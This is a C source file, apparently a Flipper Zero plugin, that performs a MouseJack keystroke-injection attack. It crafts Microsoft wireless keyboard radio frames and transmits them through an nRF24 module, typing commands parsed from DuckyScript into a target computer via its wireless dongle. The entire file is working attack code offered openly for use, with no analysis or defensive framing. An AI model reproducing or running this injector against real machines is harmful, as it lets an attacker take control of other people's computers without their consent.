mousejacker_ducky.c 17 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399
  1. #include "mousejacker_ducky.h"
  2. static const char ducky_cmd_comment[] = {"REM"};
  3. static const char ducky_cmd_delay[] = {"DELAY "};
  4. static const char ducky_cmd_string[] = {"STRING "};
  5. static const char ducky_cmd_repeat[] = {"REPEAT "};
  6. // Bytes 0 to 3 are hardcoded for my specific mouse (they should be known after the sniffing but addresses.txt doesn't save them)
  7. static uint8_t MICROSOFT_HID_TEMPLATE[] =
  8. {0x08, 0x90, 0x19, 0x01, 0x00, 0x00, 67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
  9. uint8_t prev_hid = 0;
  10. uint8_t sequence_num = 0;
  11. #define RT_THRESHOLD 50
  12. #define MICROSOFT_MIN_CHANNEL 2
  13. #define MICROSOFT_MAX_CHANNEL 83
  14. #define MICROSOFT_HID_TEMPLATE_SIZE 19
  15. #define TAG "mousejacker_ducky"
  16. MJDuckyKey mj_ducky_keys[] = {{" ", 44, 0}, {"!", 30, 2}, {"\"", 52, 2},
  17. {"#", 32, 2}, {"$", 33, 2}, {"%", 34, 2},
  18. {"&", 36, 2}, {"'", 52, 0}, {"(", 38, 2},
  19. {")", 39, 2}, {"*", 37, 2}, {"+", 46, 2},
  20. {",", 54, 0}, {"-", 45, 0}, {".", 55, 0},
  21. {"/", 56, 0}, {"0", 39, 0}, {"1", 30, 0},
  22. {"2", 31, 0}, {"3", 32, 0}, {"4", 33, 0},
  23. {"5", 34, 0}, {"6", 35, 0}, {"7", 36, 0},
  24. {"8", 37, 0}, {"9", 38, 0}, {":", 51, 2},
  25. {";", 51, 0}, {"<", 54, 2}, {"=", 46, 0},
  26. {">", 55, 2}, {"?", 56, 2}, {"@", 31, 2},
  27. {"A", 4, 2}, {"B", 5, 2}, {"C", 6, 2},
  28. {"D", 7, 2}, {"E", 8, 2}, {"F", 9, 2},
  29. {"G", 10, 2}, {"H", 11, 2}, {"I", 12, 2},
  30. {"J", 13, 2}, {"K", 14, 2}, {"L", 15, 2},
  31. {"M", 16, 2}, {"N", 17, 2}, {"O", 18, 2},
  32. {"P", 19, 2}, {"Q", 20, 2}, {"R", 21, 2},
  33. {"S", 22, 2}, {"T", 23, 2}, {"U", 24, 2},
  34. {"V", 25, 2}, {"W", 26, 2}, {"X", 27, 2},
  35. {"Y", 28, 2}, {"Z", 29, 2}, {"[", 47, 0},
  36. {"\\", 49, 0}, {"]", 48, 0}, {"^", 35, 2},
  37. {"_", 45, 2}, {"`", 53, 0}, {"a", 4, 0},
  38. {"b", 5, 0}, {"c", 6, 0}, {"d", 7, 0},
  39. {"e", 8, 0}, {"f", 9, 0}, {"g", 10, 0},
  40. {"h", 11, 0}, {"i", 12, 0}, {"j", 13, 0},
  41. {"k", 14, 0}, {"l", 15, 0}, {"m", 16, 0},
  42. {"n", 17, 0}, {"o", 18, 0}, {"p", 19, 0},
  43. {"q", 20, 0}, {"r", 21, 0}, {"s", 22, 0},
  44. {"t", 23, 0}, {"u", 24, 0}, {"v", 25, 0},
  45. {"w", 26, 0}, {"x", 27, 0}, {"y", 28, 0},
  46. {"z", 29, 0}, {"{", 47, 2}, {"|", 49, 2},
  47. {"}", 48, 2}, {"~", 53, 2}, {"BACKSPACE", 42, 0},
  48. {"", 0, 0}, {"ALT", 0, 4}, {"SHIFT", 0, 2},
  49. {"CTRL", 0, 1}, {"GUI", 0, 8}, {"SCROLLLOCK", 71, 0},
  50. {"ENTER", 40, 0}, {"F12", 69, 0}, {"HOME", 74, 0},
  51. {"F10", 67, 0}, {"F9", 66, 0}, {"ESCAPE", 41, 0},
  52. {"PAGEUP", 75, 0}, {"TAB", 43, 0}, {"PRINTSCREEN", 70, 0},
  53. {"F2", 59, 0}, {"CAPSLOCK", 57, 0}, {"F1", 58, 0},
  54. {"F4", 61, 0}, {"F6", 63, 0}, {"F8", 65, 0},
  55. {"DOWNARROW", 81, 0}, {"DELETE", 42, 0}, {"RIGHT", 79, 0},
  56. {"F3", 60, 0}, {"DOWN", 81, 0}, {"DEL", 76, 0},
  57. {"END", 77, 0}, {"INSERT", 73, 0},
  58. {"NUMLOCK", 83, 0}, {"F5", 62, 0},
  59. {"LEFTARROW", 80, 0}, {"RIGHTARROW", 79, 0}, {"PAGEDOWN", 78, 0},
  60. {"PAUSE", 72, 0}, {"SPACE", 44, 0}, {"UPARROW", 82, 0},
  61. {"F11", 68, 0}, {"F7", 64, 0}, {"UP", 82, 0},
  62. {"LEFT", 80, 0}};
  63. /*
  64. static bool mj_ducky_get_number(const char* param, uint32_t* val) {
  65. uint32_t value = 0;
  66. if(sscanf(param, "%lu", &value) == 1) {
  67. *val = value;
  68. return true;
  69. }
  70. return false;
  71. }
  72. */
  73. static uint32_t mj_ducky_get_command_len(const char* line) {
  74. uint32_t len = strlen(line);
  75. for(uint32_t i = 0; i < len; i++) {
  76. if(line[i] == ' ') return i;
  77. }
  78. return 0;
  79. }
  80. static bool mj_get_ducky_key(char* key, size_t keylen, MJDuckyKey* dk) {
  81. //FURI_LOG_D(TAG, "looking up key %s with length %d", key, keylen);
  82. for(size_t i = 0; i < sizeof(mj_ducky_keys) / sizeof(MJDuckyKey); i++) {
  83. if(!strncmp(mj_ducky_keys[i].name, key, keylen)) {
  84. memcpy(dk, &mj_ducky_keys[i], sizeof(MJDuckyKey));
  85. return true;
  86. }
  87. }
  88. return false;
  89. }
  90. static void checksum(uint8_t* payload, size_t len) {
  91. // MS checksum algorithm - as per KeyKeriki paper
  92. payload[len - 1] = 0x00;
  93. for(size_t n = 0; n < len - 2; n++) payload[len - 1] ^= payload[n];
  94. payload[len - 1] = ~payload[len - 1] & 0xff;
  95. }
  96. static void sequence(uint8_t* payload) {
  97. // MS frames use a 2 bytes sequence number
  98. payload[5] = (sequence_num >> 8) & 0xff;
  99. payload[4] = sequence_num & 0xff;
  100. sequence_num += 1;
  101. }
  102. static void inject_packet(
  103. FuriHalSpiBusHandle* handle,
  104. uint8_t* addr,
  105. uint8_t addr_size,
  106. uint8_t rate,
  107. uint8_t* payload,
  108. size_t payload_size,
  109. PluginState* plugin_state) {
  110. uint8_t rt_count = 0;
  111. while(1) {
  112. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  113. return;
  114. }
  115. if(nrf24_txpacket(handle, payload, payload_size, true)) {
  116. break;
  117. }
  118. rt_count++;
  119. // retransmit threshold exceeded, scan for new channel
  120. if(rt_count > RT_THRESHOLD) {
  121. if(nrf24_find_channel(
  122. handle,
  123. addr,
  124. addr,
  125. addr_size,
  126. rate,
  127. MICROSOFT_MIN_CHANNEL,
  128. MICROSOFT_MAX_CHANNEL,
  129. true) > MICROSOFT_MAX_CHANNEL) {
  130. return; // fail
  131. }
  132. //FURI_LOG_D("mj", "find channel passed, %d", tessst);
  133. rt_count = 0;
  134. }
  135. }
  136. }
  137. static void build_hid_packet(uint8_t mod, uint8_t hid, uint8_t* payload) {
  138. memcpy(payload, MICROSOFT_HID_TEMPLATE, MICROSOFT_HID_TEMPLATE_SIZE);
  139. payload[7] = mod;
  140. payload[9] = hid;
  141. sequence(payload);
  142. checksum(payload, MICROSOFT_HID_TEMPLATE_SIZE);
  143. /*uint8_t byte;
  144. uint8_t i;
  145. FURI_LOG_I(TAG, "build_hid_packet");
  146. for(i=0; i < MICROSOFT_HID_TEMPLATE_SIZE; i++) {
  147. byte = payload[i];
  148. FURI_LOG_I(TAG, "%02x ", byte);
  149. }*/
  150. }
  151. static void send_hid_packet(
  152. FuriHalSpiBusHandle* handle,
  153. uint8_t* addr,
  154. uint8_t addr_size,
  155. uint8_t rate,
  156. uint8_t mod,
  157. uint8_t hid,
  158. PluginState* plugin_state) {
  159. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  160. build_hid_packet(0, 0, hid_payload);
  161. if(hid == prev_hid)
  162. inject_packet(
  163. handle,
  164. addr,
  165. addr_size,
  166. rate,
  167. hid_payload,
  168. MICROSOFT_HID_TEMPLATE_SIZE,
  169. plugin_state); // empty hid packet
  170. prev_hid = hid;
  171. build_hid_packet(mod, hid, hid_payload);
  172. inject_packet(
  173. handle, addr, addr_size, rate, hid_payload, MICROSOFT_HID_TEMPLATE_SIZE, plugin_state);
  174. furi_delay_ms(12);
  175. }
  176. // returns false if there was an error processing script line
  177. static bool mj_process_ducky_line(
  178. FuriHalSpiBusHandle* handle,
  179. uint8_t* addr,
  180. uint8_t addr_size,
  181. uint8_t rate,
  182. char* line,
  183. char* prev_line,
  184. PluginState* plugin_state) {
  185. MJDuckyKey dk;
  186. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  187. char* line_tmp = line;
  188. uint32_t line_len = strlen(line);
  189. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  190. return true;
  191. }
  192. for(uint32_t i = 0; i < line_len; i++) {
  193. if((line_tmp[i] != ' ') && (line_tmp[i] != '\t') && (line_tmp[i] != '\n')) {
  194. line_tmp = &line_tmp[i];
  195. break; // Skip spaces and tabs
  196. }
  197. if(i == line_len - 1) return true; // Skip empty lines
  198. }
  199. FURI_LOG_D(TAG, "line: %s", line_tmp);
  200. // General commands
  201. if(strncmp(line_tmp, ducky_cmd_comment, strlen(ducky_cmd_comment)) == 0) {
  202. // REM - comment line
  203. return true;
  204. } else if(strncmp(line_tmp, ducky_cmd_delay, strlen(ducky_cmd_delay)) == 0) {
  205. // DELAY
  206. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  207. uint32_t delay_val = 0;
  208. delay_val = atoi(line_tmp);
  209. if(delay_val > 0) {
  210. uint32_t delay_count = delay_val / 10;
  211. build_hid_packet(0, 0, hid_payload);
  212. inject_packet(
  213. handle,
  214. addr,
  215. addr_size,
  216. rate,
  217. hid_payload,
  218. MICROSOFT_HID_TEMPLATE_SIZE,
  219. plugin_state); // empty hid packet
  220. for(uint32_t i = 0; i < delay_count; i++) {
  221. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  222. return true;
  223. }
  224. /*inject_packet(
  225. handle,
  226. addr,
  227. addr_size,
  228. rate,
  229. LOGITECH_KEEPALIVE,
  230. LOGITECH_KEEPALIVE_SIZE,
  231. plugin_state);*/
  232. furi_delay_ms(10);
  233. }
  234. return true;
  235. }
  236. return false;
  237. } else if(strncmp(line_tmp, ducky_cmd_string, strlen(ducky_cmd_string)) == 0) {
  238. // STRING
  239. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  240. for(size_t i = 0; i < strlen(line_tmp); i++) {
  241. if(!mj_get_ducky_key(&line_tmp[i], 1, &dk)) return false;
  242. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  243. }
  244. return true;
  245. } else if(strncmp(line_tmp, ducky_cmd_repeat, strlen(ducky_cmd_repeat)) == 0) {
  246. // REPEAT
  247. uint32_t repeat_cnt = 0;
  248. if(prev_line == NULL) return false;
  249. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  250. repeat_cnt = atoi(line_tmp);
  251. if(repeat_cnt < 2) return false;
  252. FURI_LOG_D(TAG, "repeating %s %ld times", prev_line, repeat_cnt);
  253. for(uint32_t i = 0; i < repeat_cnt; i++)
  254. mj_process_ducky_line(handle, addr, addr_size, rate, prev_line, NULL, plugin_state);
  255. return true;
  256. } else if(strncmp(line_tmp, "ALT", strlen("ALT")) == 0) {
  257. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  258. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  259. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 4, dk.hid, plugin_state);
  260. return true;
  261. } else if(
  262. strncmp(line_tmp, "GUI", strlen("GUI")) == 0 ||
  263. strncmp(line_tmp, "WINDOWS", strlen("WINDOWS")) == 0 ||
  264. strncmp(line_tmp, "COMMAND", strlen("COMMAND")) == 0) {
  265. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  266. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  267. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 8, dk.hid, plugin_state);
  268. return true;
  269. } else if(
  270. strncmp(line_tmp, "CTRL-ALT", strlen("CTRL-ALT")) == 0 ||
  271. strncmp(line_tmp, "CONTROL-ALT", strlen("CONTROL-ALT")) == 0) {
  272. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  273. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  274. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 4 | 1, dk.hid, plugin_state);
  275. return true;
  276. } else if(
  277. strncmp(line_tmp, "CTRL-SHIFT", strlen("CTRL-SHIFT")) == 0 ||
  278. strncmp(line_tmp, "CONTROL-SHIFT", strlen("CONTROL-SHIFT")) == 0) {
  279. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  280. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  281. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 1 | 2, dk.hid, plugin_state);
  282. return true;
  283. } else if(
  284. strncmp(line_tmp, "CTRL", strlen("CTRL")) == 0 ||
  285. strncmp(line_tmp, "CONTROL", strlen("CONTROL")) == 0) {
  286. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  287. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  288. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 1, dk.hid, plugin_state);
  289. return true;
  290. } else if(strncmp(line_tmp, "SHIFT", strlen("SHIFT")) == 0) {
  291. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  292. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  293. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 2, dk.hid, plugin_state);
  294. return true;
  295. } else if(
  296. strncmp(line_tmp, "ESC", strlen("ESC")) == 0 ||
  297. strncmp(line_tmp, "APP", strlen("APP")) == 0 ||
  298. strncmp(line_tmp, "ESCAPE", strlen("ESCAPE")) == 0) {
  299. if(!mj_get_ducky_key("ESCAPE", 6, &dk)) return false;
  300. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  301. return true;
  302. } else if(strncmp(line_tmp, "ENTER", strlen("ENTER")) == 0) {
  303. if(!mj_get_ducky_key("ENTER", 5, &dk)) return false;
  304. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  305. return true;
  306. } else if(
  307. strncmp(line_tmp, "UP", strlen("UP")) == 0 ||
  308. strncmp(line_tmp, "UPARROW", strlen("UPARROW")) == 0) {
  309. if(!mj_get_ducky_key("UP", 2, &dk)) return false;
  310. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  311. return true;
  312. } else if(
  313. strncmp(line_tmp, "DOWN", strlen("DOWN")) == 0 ||
  314. strncmp(line_tmp, "DOWNARROW", strlen("DOWNARROW")) == 0) {
  315. if(!mj_get_ducky_key("DOWN", 4, &dk)) return false;
  316. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  317. return true;
  318. } else if(
  319. strncmp(line_tmp, "LEFT", strlen("LEFT")) == 0 ||
  320. strncmp(line_tmp, "LEFTARROW", strlen("LEFTARROW")) == 0) {
  321. if(!mj_get_ducky_key("LEFT", 4, &dk)) return false;
  322. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  323. return true;
  324. } else if(
  325. strncmp(line_tmp, "RIGHT", strlen("RIGHT")) == 0 ||
  326. strncmp(line_tmp, "RIGHTARROW", strlen("RIGHTARROW")) == 0) {
  327. if(!mj_get_ducky_key("RIGHT", 5, &dk)) return false;
  328. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  329. return true;
  330. } else if(strncmp(line_tmp, "SPACE", strlen("SPACE")) == 0) {
  331. if(!mj_get_ducky_key("SPACE", 5, &dk)) return false;
  332. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  333. return true;
  334. } else if(strncmp(line_tmp, "NUMLOCK", strlen("NUMLOCK")) == 0) {
  335. if(!mj_get_ducky_key("NUMLOCK", 7, &dk)) return false;
  336. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  337. return true;
  338. }
  339. return false;
  340. }
  341. void mj_process_ducky_script(
  342. FuriHalSpiBusHandle* handle,
  343. uint8_t* addr,
  344. uint8_t addr_size,
  345. uint8_t rate,
  346. char* script,
  347. PluginState* plugin_state) {
  348. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  349. char* prev_line = NULL;
  350. /*inject_packet(
  351. handle, addr, addr_size, rate, LOGITECH_HELLO, LOGITECH_HELLO_SIZE, plugin_state);*/
  352. char* line = strtok(script, "\n");
  353. while(line != NULL) {
  354. if(strcmp(&line[strlen(line) - 1], "\r") == 0) line[strlen(line) - 1] = (char)0;
  355. if(!mj_process_ducky_line(handle, addr, addr_size, rate, line, prev_line, plugin_state))
  356. FURI_LOG_D(TAG, "unable to process ducky script line: %s", line);
  357. prev_line = line;
  358. line = strtok(NULL, "\n");
  359. }
  360. build_hid_packet(0, 0, hid_payload);
  361. inject_packet(
  362. handle,
  363. addr,
  364. addr_size,
  365. rate,
  366. hid_payload,
  367. MICROSOFT_HID_TEMPLATE_SIZE,
  368. plugin_state); // empty hid packet at end
  369. }